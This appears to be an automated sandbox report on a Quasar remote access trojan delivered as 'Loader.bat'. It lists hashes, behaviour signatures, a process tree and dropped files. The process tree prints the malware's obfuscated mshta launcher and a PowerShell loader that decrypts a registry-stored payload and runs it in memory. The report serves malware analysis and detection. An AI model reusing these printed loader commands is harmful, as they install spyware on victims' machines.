Overview

overview

10

Static

static

1

Loader.bat

windows11-21h2-x64

10

Analysis

  • max time kernel
    210s
  • max time network
    212s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240419-en
  • resource tags

    arch:x64arch:x86image:win11-20240419-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    28-04-2024 21:08

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Loader.bat

  • Size

    15.5MB

  • MD5

    28423a8cfd1097bdbf64e841a2c8257a

  • SHA1

    92fb218c0267e5060cb1153aab5f56f669561346

  • SHA256

    b7182ecea0be3db16dba21b00b2dba41f24bc6fe6a6f4b7131a4a420f5e139d0

  • SHA512

    11e47c5c300b24457254c3a2815c744c7dd3fdfaa038d36a5f1220dfe92b5c93ce646257d4105b5a40b83e64237781204db1446eaf413cbcd0f0119e25c0653f

  • SSDEEP

    49152:tVEJF+mCi8R797l/kfuubQ6Pu3AnIVtL/3DuGs/se5Q0t2/Q7TSiRBlt1JtT6mrH:y

Score
10/10
quasarspywaretrojan

Malware Config

Extracted

Family

quasar

Attributes
  • reconnect_delay

    3000

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar payload 1 IoCs
  • Deletes itself 1 IoCs
  • Executes dropped EXE 8 IoCs
  • Drops file in System32 directory 3 IoCs
  • Drops file in Windows directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 16 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\lsass.exe
    C:\Windows\system32\lsass.exe
    1⤵
      PID:696
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
      1⤵
        PID:988
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
        1⤵
          PID:540
        • C:\Windows\System32\svchost.exe
          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
          1⤵
            PID:1004
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
            1⤵
              PID:1072
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
              1⤵
                PID:1160
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                1⤵
                  PID:1176
                  • C:\Windows\$sxr-mshta.exe
                    C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-CTPjigOuhzyhJbtlIFtU4312:NLdKdIYo=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
                    2⤵
                    • Executes dropped EXE
                    • Modifies registry class
                    • Suspicious use of WriteProcessMemory
                    PID:2300
                    • C:\Windows\$sxr-cmd.exe
                      "C:\Windows\$sxr-cmd.exe" /c %$sxr-CTPjigOuhzyhJbtlIFtU4312:NLdKdIYo=%
                      3⤵
                      • Executes dropped EXE
                      • Suspicious use of WriteProcessMemory
                      PID:4964
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:vDoLArpYUH; "
                        4⤵
                          PID:436
                        • C:\Windows\$sxr-powershell.exe
                          C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass
                          4⤵
                          • Executes dropped EXE
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:996
                    • C:\Windows\$sxr-mshta.exe
                      C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-CTPjigOuhzyhJbtlIFtU4312:NLdKdIYo=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
                      2⤵
                      • Executes dropped EXE
                      • Modifies registry class
                      PID:4712
                      • C:\Windows\$sxr-cmd.exe
                        "C:\Windows\$sxr-cmd.exe" /c %$sxr-CTPjigOuhzyhJbtlIFtU4312:NLdKdIYo=%
                        3⤵
                        • Executes dropped EXE
                        PID:5096
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:vDoLArpYUH; "
                          4⤵
                            PID:488
                          • C:\Windows\$sxr-powershell.exe
                            C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass
                            4⤵
                            • Executes dropped EXE
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of SetWindowsHookEx
                            PID:2948
                            • C:\Windows\$sxr-cmd.exe
                              "C:\Windows\$sxr-cmd.exe" /C set "UwhVnRqJxw=[System.Diagnostics.Process]::GetProcessById(2948).WaitForExit();[System.Threading.Thread]::Sleep(5000); function MkvkY($bUbRm){ $iKGwT=[System.Security.Cryptography.Aes]::Create(); $iKGwT.Mode=[System.Security.Cryptography.CipherMode]::CBC; $iKGwT.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $iKGwT.Key=[System.Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))('KuBWPobWiiJOmD8Q6GHQNwVjO7+9R+J9Wm17vUObkkA='); $iKGwT.IV=[System.Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))('sqFrrsfeSkktOOraqj5J8A=='); $CIcDs=$iKGwT.('@C@r@e@a@t@e@D@e@c@r@y@p@t@o@r@'.Replace('@', ''))(); $GYdeq=$CIcDs.('@T@r@a@n@s@f@o@r@m@F@i@n@a@l@B@l@o@c@k@'.Replace('@', ''))($bUbRm, 0, $bUbRm.Length); $CIcDs.Dispose(); $iKGwT.Dispose(); $GYdeq;}function tCVmY($bUbRm){ $uzRVy=New-Object System.IO.MemoryStream(,$bUbRm); $VIRqG=New-Object System.IO.MemoryStream; Invoke-Expression '$WglST @=@ @N@e@w@-@O@b@j@e@c@t@ @S@y@s@t@e@m@.@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@G@Z@i@p@S@t@r@e@a@m@(@$uzRVy,@ @[@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@C@o@m@p@r@e@s@s@i@o@n@M@o@d@e@]@:@:@D@e@c@o@m@p@r@e@s@s@)@;@'.Replace('@', ''); $WglST.CopyTo($VIRqG); $WglST.Dispose(); $uzRVy.Dispose(); $VIRqG.Dispose(); $VIRqG.ToArray();}function fFsyu($bUbRm){ $GYdeq = [System.Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))($bUbRm); $GYdeq = MkvkY($GYdeq); $GYdeq = [System.Text.Encoding]::('@U@T@F@8@'.Replace('@', '')).('@G@e@t@S@t@r@i@n@g@'.Replace('@', ''))($GYdeq); return $GYdeq;}function execute_function($bUbRm,$ZjCsG){ $YBYOs = @( '$NRHJu = [System.@R@e@f@l@e@c@t@i@o@[email protected]]::@L@o@a@d@([byte[]]$bUbRm);'.Replace('@', ''), '$goSii = $NRHJu.EntryPoint;', '$goSii.Invoke($null, $ZjCsG);' ); foreach ($VgESO in $YBYOs) { Invoke-Expression $VgESO };}$mzJlV = fFsyu('fudm9P+5U13XElo+ki4gTQ==');$tlsUI = fFsyu('0zTPyjqPBqsg1i/JxrY+jz6lOn5dH7i9dF0ebxotvaU=');$NfOPZ = fFsyu('pHbA1ShtLK/NsP6VxOvjKQ==');$zkWAi = fFsyu('JmrJIwa68P/DC0qFVGxuiw==');if (@(get-process -ea silentlycontinue $zkWAi).count -gt 1) {exit};$SSiGX = [Microsoft.Win32.Registry]::('@L@o@c@a@l@M@a@c@h@i@n@e@'.Replace('@', '')).('@O@p@e@n@S@u@b@k@e@y@'.Replace('@', ''))($mzJlV).('@G@e@t@V@a@l@u@e@'.Replace('@', ''))($tlsUI);$cLxJS=tCVmY (MkvkY ([Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))($SSiGX)));execute_function $cLxJS (,[string[]] ($NfOPZ));" & echo Invoke-Expression $env:UwhVnRqJxw; | C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass > nul
                              5⤵
                              • Executes dropped EXE
                              PID:4716
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:UwhVnRqJxw; "
                                6⤵
                                  PID:3444
                                • C:\Windows\$sxr-powershell.exe
                                  C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass
                                  6⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:332
                      • C:\Windows\System32\svchost.exe
                        C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
                        1⤵
                          PID:1228
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                          1⤵
                            PID:1264
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                            1⤵
                              PID:1292
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                              1⤵
                                PID:1372
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                1⤵
                                  PID:1444
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k NetworkService -p
                                  1⤵
                                    PID:1604
                                  • C:\Windows\System32\svchost.exe
                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                    1⤵
                                    • Drops file in System32 directory
                                    PID:1616
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                    1⤵
                                      PID:1660
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                      1⤵
                                        PID:1672
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                        1⤵
                                          PID:1756
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                          1⤵
                                            PID:1816
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                            1⤵
                                              PID:1840
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                              1⤵
                                                PID:1984
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1832
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:1976
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                    1⤵
                                                      PID:2064
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                      1⤵
                                                        PID:2100
                                                      • C:\Windows\System32\spoolsv.exe
                                                        C:\Windows\System32\spoolsv.exe
                                                        1⤵
                                                          PID:2168
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                          1⤵
                                                            PID:2312
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                            1⤵
                                                              PID:2324
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                              1⤵
                                                                PID:2520
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                1⤵
                                                                  PID:2548
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k NetworkService -p
                                                                  1⤵
                                                                    PID:2604
                                                                  • C:\Windows\sysmon.exe
                                                                    C:\Windows\sysmon.exe
                                                                    1⤵
                                                                      PID:2704
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                      1⤵
                                                                        PID:2720
                                                                      • C:\Windows\System32\svchost.exe
                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                        1⤵
                                                                          PID:2736
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                          1⤵
                                                                            PID:2780
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                            1⤵
                                                                              PID:2824
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                              1⤵
                                                                                PID:2880
                                                                              • C:\Windows\system32\wbem\unsecapp.exe
                                                                                C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                1⤵
                                                                                  PID:3136
                                                                                • C:\Windows\Explorer.EXE
                                                                                  C:\Windows\Explorer.EXE
                                                                                  1⤵
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:3292
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Loader.bat"
                                                                                    2⤵
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:3172
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:VbLHakvKOm; "
                                                                                      3⤵
                                                                                        PID:2788
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden
                                                                                        3⤵
                                                                                        • Deletes itself
                                                                                        • Drops file in Windows directory
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:2800
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                    1⤵
                                                                                      PID:3428
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                      1⤵
                                                                                        PID:3456
                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                        C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                        1⤵
                                                                                          PID:3992
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
                                                                                          1⤵
                                                                                            PID:4012
                                                                                          • C:\Windows\system32\DllHost.exe
                                                                                            C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
                                                                                            1⤵
                                                                                              PID:4356
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
                                                                                              1⤵
                                                                                                PID:4376
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                                1⤵
                                                                                                  PID:3696
                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                  1⤵
                                                                                                    PID:788
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                    1⤵
                                                                                                      PID:4652
                                                                                                    • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                      "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                      1⤵
                                                                                                        PID:3556
                                                                                                      • C:\Windows\system32\SppExtComObj.exe
                                                                                                        C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                        1⤵
                                                                                                          PID:1148
                                                                                                        • C:\Windows\System32\svchost.exe
                                                                                                          C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                          1⤵
                                                                                                            PID:692
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                            1⤵
                                                                                                              PID:1860
                                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                                              C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                              1⤵
                                                                                                                PID:2616
                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                                1⤵
                                                                                                                  PID:1352
                                                                                                                • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                  C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                  1⤵
                                                                                                                    PID:4536
                                                                                                                  • C:\Windows\System32\rundll32.exe
                                                                                                                    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                    1⤵
                                                                                                                      PID:1948

                                                                                                                    Network

                                                                                                                    MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                    Initial Access

                                                                                                                    Execution

                                                                                                                    Persistence

                                                                                                                    Privilege Escalation

                                                                                                                    Defense Evasion

                                                                                                                    Credential Access

                                                                                                                    Discovery

                                                                                                                    System Information Discovery

                                                                                                                    1
                                                                                                                    T1082

                                                                                                                    Query Registry

                                                                                                                    1
                                                                                                                    T1012

                                                                                                                    Lateral Movement

                                                                                                                    Collection

                                                                                                                    Exfiltration

                                                                                                                    Command and Control

                                                                                                                    Impact

                                                                                                                    Resource Development

                                                                                                                    Reconnaissance

                                                                                                                    Replay Monitor

                                                                                                                    Loading Replay Monitor...

                                                                                                                    Downloads

                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                                      Filesize

                                                                                                                      62KB

                                                                                                                      MD5

                                                                                                                      e566632d8956997225be604d026c9b39

                                                                                                                      SHA1

                                                                                                                      94a9aade75fffc63ed71404b630eca41d3ce130e

                                                                                                                      SHA256

                                                                                                                      b7f66a3543488b08d8533f290eb5f2df7289531934e6db9c346714cfbf609cf0

                                                                                                                      SHA512

                                                                                                                      f244eb419eef0617cd585002e52c26120e57fcbadc37762c100712c55ff3c29b0f3991c2ffa8eefc4080d2a8dbfa01b188250ea440d631efed358e702cc3fecd

                                                                                                                      Download Submit
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jje0cpot.rtr.ps1
                                                                                                                      Filesize

                                                                                                                      60B

                                                                                                                      MD5

                                                                                                                      d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                      SHA1

                                                                                                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                      SHA256

                                                                                                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                      SHA512

                                                                                                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                      Download Submit
                                                                                                                    • C:\Windows\$sxr-cmd.exe
                                                                                                                      Filesize

                                                                                                                      324KB

                                                                                                                      MD5

                                                                                                                      c5db7b712f280c3ae4f731ad7d5ea171

                                                                                                                      SHA1

                                                                                                                      e8717ff0d40e01fd3b06de2aa5a401bed1c907cc

                                                                                                                      SHA256

                                                                                                                      f6c9532e1f4b66be96f0f56bd7c3a3c1997ea8066b91bfcc984e41f072c347ba

                                                                                                                      SHA512

                                                                                                                      bceaf7dc30f2c99b40b7025a5eb063f3131a1ef9349fdf356720eaef838bcf58ce3d5e3bad9459ddd2f872df430bdb66a766a5acff5d3bbc738eba8945cb0a89

                                                                                                                      Download Submit
                                                                                                                    • C:\Windows\$sxr-mshta.exe
                                                                                                                      Filesize

                                                                                                                      32KB

                                                                                                                      MD5

                                                                                                                      356e04e106f6987a19938df67dea0b76

                                                                                                                      SHA1

                                                                                                                      f2fd7cde5f97427e497dfb07b7f682149dc896fb

                                                                                                                      SHA256

                                                                                                                      4ed8a115fa1dcfd532397b800775c1b54d2d407b52118b5423e94ff1ce855d7e

                                                                                                                      SHA512

                                                                                                                      df1c655fa3a95e001084af8c3aa97c54dbcb690210e1353dd836702cfb4af3c857449df62aa62d7ab525ffb4e0dc1552181dfcdee2c28f4af5c20df6d95811cd

                                                                                                                      Download Submit
                                                                                                                    • C:\Windows\$sxr-powershell.exe
                                                                                                                      Filesize

                                                                                                                      440KB

                                                                                                                      MD5

                                                                                                                      0e9ccd796e251916133392539572a374

                                                                                                                      SHA1

                                                                                                                      eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204

                                                                                                                      SHA256

                                                                                                                      c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221

                                                                                                                      SHA512

                                                                                                                      e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d

                                                                                                                      Download Submit
                                                                                                                    • memory/540-131-0x0000027DE8310000-0x0000027DE8339000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      164KB

                                                                                                                      Download
                                                                                                                    • memory/540-132-0x0000027DE8310000-0x0000027DE8339000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      164KB

                                                                                                                      Download
                                                                                                                    • memory/540-124-0x0000027DE8310000-0x0000027DE8339000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      164KB

                                                                                                                      Download
                                                                                                                    • memory/540-130-0x00007FFE4C0D0000-0x00007FFE4C0E0000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      64KB

                                                                                                                      Download
                                                                                                                    • memory/696-99-0x000002AA30E80000-0x000002AA30EA9000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      164KB

                                                                                                                      Download
                                                                                                                    • memory/696-100-0x000002AA30E80000-0x000002AA30EA9000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      164KB

                                                                                                                      Download
                                                                                                                    • memory/696-98-0x000002AA30E50000-0x000002AA30E73000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      140KB

                                                                                                                      Download
                                                                                                                    • memory/696-106-0x00007FFE4C0D0000-0x00007FFE4C0E0000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      64KB

                                                                                                                      Download
                                                                                                                    • memory/696-107-0x000002AA30E80000-0x000002AA30EA9000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      164KB

                                                                                                                      Download
                                                                                                                    • memory/696-108-0x000002AA30E80000-0x000002AA30EA9000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      164KB

                                                                                                                      Download
                                                                                                                    • memory/988-118-0x00007FFE4C0D0000-0x00007FFE4C0E0000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      64KB

                                                                                                                      Download
                                                                                                                    • memory/988-119-0x000001AA30690000-0x000001AA306B9000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      164KB

                                                                                                                      Download
                                                                                                                    • memory/988-120-0x000001AA30690000-0x000001AA306B9000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      164KB

                                                                                                                      Download
                                                                                                                    • memory/988-112-0x000001AA30690000-0x000001AA306B9000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      164KB

                                                                                                                      Download
                                                                                                                    • memory/996-90-0x00000113FEAA0000-0x00000113FEB0A000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      424KB

                                                                                                                      Download
                                                                                                                    • memory/996-81-0x00000113F3AD0000-0x00000113F3AD6000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      24KB

                                                                                                                      Download
                                                                                                                    • memory/996-91-0x00000113FEB10000-0x00000113FEB52000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      264KB

                                                                                                                      Download
                                                                                                                    • memory/996-75-0x00000113FC2F0000-0x00000113FC996000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      6.6MB

                                                                                                                      Download
                                                                                                                    • memory/996-86-0x00000113FE5F0000-0x00000113FE6A2000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      712KB

                                                                                                                      Download
                                                                                                                    • memory/996-85-0x00000113FE260000-0x00000113FE5EC000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      3.5MB

                                                                                                                      Download
                                                                                                                    • memory/996-84-0x00000113FDAB0000-0x00000113FE25E000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      7.7MB

                                                                                                                      Download
                                                                                                                    • memory/996-83-0x00000113FD560000-0x00000113FDAAE000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      5.3MB

                                                                                                                      Download
                                                                                                                    • memory/996-82-0x00000113F4070000-0x00000113F4076000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      24KB

                                                                                                                      Download
                                                                                                                    • memory/996-95-0x0000000180000000-0x0000000180007000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      28KB

                                                                                                                      Download
                                                                                                                    • memory/996-80-0x00000113F3500000-0x00000113F3522000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      136KB

                                                                                                                      Download
                                                                                                                    • memory/996-79-0x00007FFE8BC40000-0x00007FFE8BCFD000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      756KB

                                                                                                                      Download
                                                                                                                    • memory/996-78-0x00007FFE8C040000-0x00007FFE8C249000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      2.0MB

                                                                                                                      Download
                                                                                                                    • memory/996-76-0x00000113FC9A0000-0x00000113FD088000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      6.9MB

                                                                                                                      Download
                                                                                                                    • memory/1004-136-0x0000017D96B60000-0x0000017D96B89000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      164KB

                                                                                                                      Download
                                                                                                                    • memory/1004-144-0x0000017D96B60000-0x0000017D96B89000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      164KB

                                                                                                                      Download
                                                                                                                    • memory/1004-143-0x0000017D96B60000-0x0000017D96B89000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      164KB

                                                                                                                      Download
                                                                                                                    • memory/1004-142-0x00007FFE4C0D0000-0x00007FFE4C0E0000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      64KB

                                                                                                                      Download
                                                                                                                    • memory/2800-30-0x0000022DE8710000-0x0000022DE876E000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      376KB

                                                                                                                      Download
                                                                                                                    • memory/2800-27-0x0000022DF2660000-0x0000022DF275C000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      1008KB

                                                                                                                      Download
                                                                                                                    • memory/2800-55-0x00007FFE6A968000-0x00007FFE6A969000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download
                                                                                                                    • memory/2800-45-0x0000000180000000-0x0000000180007000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      28KB

                                                                                                                      Download
                                                                                                                    • memory/2800-44-0x0000022DF35C0000-0x0000022DF35C8000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      32KB

